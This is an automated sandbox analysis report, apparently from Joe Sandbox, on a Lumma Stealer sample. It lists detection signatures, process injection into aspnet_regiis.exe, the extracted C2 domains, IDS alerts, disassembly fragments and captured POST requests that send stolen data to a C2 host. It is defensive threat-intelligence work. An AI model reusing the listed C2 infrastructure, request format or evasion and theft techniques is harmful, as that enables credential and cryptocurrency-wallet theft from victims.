Windows Analysis Report
ForcesLangi.exe

Overview

General Information

Sample name: ForcesLangi.exe
Analysis ID: 1581499
MD5: 64f1abe3f2f65e545c54b23809c06583
SHA1: 8c32e992999dd0bf57cc45fed77c858cb4768a09
SHA256: 05617db5aed9685ac891f4a7539294603640443b4ca5534abac163a544c574fa
Tags: exe, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • ForcesLangi.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\ForcesLangi.exe" MD5: 64F1ABE3F2F65E545C54B23809C06583)
    • conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • aspnet_regiis.exe (PID: 4820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["scentniej.buzz", "rebuildeso.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "HpOoIh--aadb880da83d"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1832206097.0000000002A7B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000003.1831883195.0000000002A7A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: aspnet_regiis.exe PID: 4820 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: aspnet_regiis.exe PID: 4820 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:37:59.411853+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 92.122.104.90 | 443 | TCP
2024-12-27T22:38:01.942440+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:03.936184+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:06.368262+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:08.761026+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:13.131035+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:15.715385+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:17.788574+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:20.418310+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 104.21.66.86 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:38:02.668693+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP
2024-12-27T22:38:04.707649+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:38:02.668693+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 104.21.66.86 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:38:04.707649+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49732 | 104.21.66.86 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:38:19.549492+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 104.21.66.86 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-27T22:38:00.287622+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.4 | 49730 | 92.122.104.90 | 443 | TCP

AV Detection

Source: https://lev-tolstoi.com:443/apipi | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/?# | Avira URL Cloud: Label: malware
Source: https://prisonyfork.buzz:443/api | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiA | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiQ0O0q | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/api_q | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apiB | Avira URL Cloud: Label: malware
Source: https://appliacnesot.buzz:443/api | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apil | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com:443/apiZ | Avira URL Cloud: Label: malware
Source: ForcesLangi.exe | Malware Configuration Extractor: LummaC {"C2 url": ["scentniej.buzz", "rebuildeso.buzz", "ingreem-eilish.biz", "screwamusresz.buzz", "cashfuzysao.buzz", "inherineau.buzz", "prisonyfork.buzz", "appliacnesot.buzz", "hummskitnj.buzz"], "Build id": "HpOoIh--aadb880da83d"}
Source: ForcesLangi.exe | ReversingLabs: Detection: 52%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\gdi32.dll | Joe Sandbox ML: detected
Source: ForcesLangi.exe | Joe Sandbox ML: detected
Source: ForcesLangi.exe | String decryptor: hummskitnj.buzz
Source: ForcesLangi.exe | String decryptor: cashfuzysao.buzz
Source: ForcesLangi.exe | String decryptor: appliacnesot.buzz
Source: ForcesLangi.exe | String decryptor: screwamusresz.buzz
Source: ForcesLangi.exe | String decryptor: inherineau.buzz
Source: ForcesLangi.exe | String decryptor: scentniej.buzz
Source: ForcesLangi.exe | String decryptor: rebuildeso.buzz
Source: ForcesLangi.exe | String decryptor: prisonyfork.buzz
Source: ForcesLangi.exe | String decryptor: ingreem-eilish.biz
Source: ForcesLangi.exe | String decryptor: lid=%s&j=%s&ver=4.0
Source: ForcesLangi.exe | String decryptor: TeslaBrowser/5.5
Source: ForcesLangi.exe | String decryptor: - Screen Resoluton:
Source: ForcesLangi.exe | String decryptor: - Physical Installed Memory:
Source: ForcesLangi.exe | String decryptor: Workgroup: -
Source: ForcesLangi.exe | String decryptor: HpOoIh--aadb880da83d
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 2_2_007357C0 CryptUnprotectData | 2_2_007357C0
Source: ForcesLangi.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: ForcesLangi.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\ForcesLangi.exe | Code function: 0_2_6CE331E0 FindFirstFileExW | 0_2_6CE331E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then lea esi, dword ptr [eax+00000270h] | 2_2_00728A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00741A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 2_2_00760340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074D34A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, dword ptr [esi+30h] | 2_2_0072CC7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov eax, ebx | 2_2_00747440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h] | 2_2_00747440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-16h] | 2_2_00760D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ebx | 2_2_00728600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] | 2_2_00761720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0074C850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_00742830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h] | 2_2_0075C830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then push esi | 2_2_0072C805
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 2_2_0073B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 2_2_0073B8F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074C0E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov esi, ecx | 2_2_007490D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0073D8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0073D8D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074E0DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov eax, ebx | 2_2_0073C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh] | 2_2_0073C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+edx+0Ah] | 2_2_0073C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-2E3D7ACEh] | 2_2_0073C8A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0073D8AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0073D8AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074C09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 2_2_0074B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0074D17D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-16h] | 2_2_00761160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074C09E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0074D116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_007489E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_007481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp edx | 2_2_007439B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+eax] | 2_2_007439B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h | 2_2_0075C990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [edi], al | 2_2_0074B980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ecx+ebx*8], 385488F2h | 2_2_0075CA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then dec edx | 2_2_0075FA20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 2_2_00756210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 2_2_0074AAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+0Ah] | 2_2_0072AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then dec edx | 2_2_0075FB28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then dec edx | 2_2_0075FB2A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then dec edx | 2_2_0075FB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0073C300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 2_2_007273D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 2_2_007273D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_007483D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-6E2DD57Fh] | 2_2_0073EB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_0073747D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [edx], di | 2_2_0073747D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [eax+edi-74D5A7FEh] | 2_2_0074C465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074C465
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_00734CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then dec edx | 2_2_0075FD70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+61765397h] | 2_2_0073B57D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 2_2_00746D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 2_2_00748528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh | 2_2_0075CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-3ECB279Fh] | 2_2_0075CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh | 2_2_0075CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7F7BECC6h | 2_2_0075CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074DDFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx esi, byte ptr [ebp+eax-46h] | 2_2_0075EDC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, ecx | 2_2_0074A5B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_00742E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp edx | 2_2_00742E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [edx+eax] | 2_2_00742E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov byte ptr [ebx], al | 2_2_0074DE07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then dec edx | 2_2_0075FE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-16h] | 2_2_007606F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx eax, byte ptr [ebp+edi+00000090h] | 2_2_00722EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edx, ecx | 2_2_00749E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov word ptr [eax], cx | 2_2_00736F52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+20h] | 2_2_00747740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp eax | 2_2_00749739
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov ecx, eax | 2_2_0074BF13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov edi, dword ptr [esp+28h] | 2_2_00745F1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then jmp edx | 2_2_007437D6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 4x nop then mov dword ptr [esp+20h], eax | 2_2_00729780

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49730 -> 92.122.104.90:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.66.86:443
Source: Malware configuration extractor | URLs: scentniej.buzz
Source: Malware configuration extractor | URLs: rebuildeso.buzz
Source: Malware configuration extractor | URLs: ingreem-eilish.biz
Source: Malware configuration extractor | URLs: screwamusresz.buzz
Source: Malware configuration extractor | URLs: cashfuzysao.buzz
Source: Malware configuration extractor | URLs: inherineau.buzz
Source: Malware configuration extractor | URLs: prisonyfork.buzz
Source: Malware configuration extractor | URLs: appliacnesot.buzz
Source: Malware configuration extractor | URLs: hummskitnj.buzz
Source: Joe Sandbox View | IP Address: 104.21.66.86 104.21.66.86
Source: Joe Sandbox View | IP Address: 92.122.104.90 92.122.104.90
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 92.122.104.90:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LEXMHB03TXM1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18134Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6G77YAN4O6JQCPPA9FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VTE315RFUWUZY5User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: lev-tolstoi.com
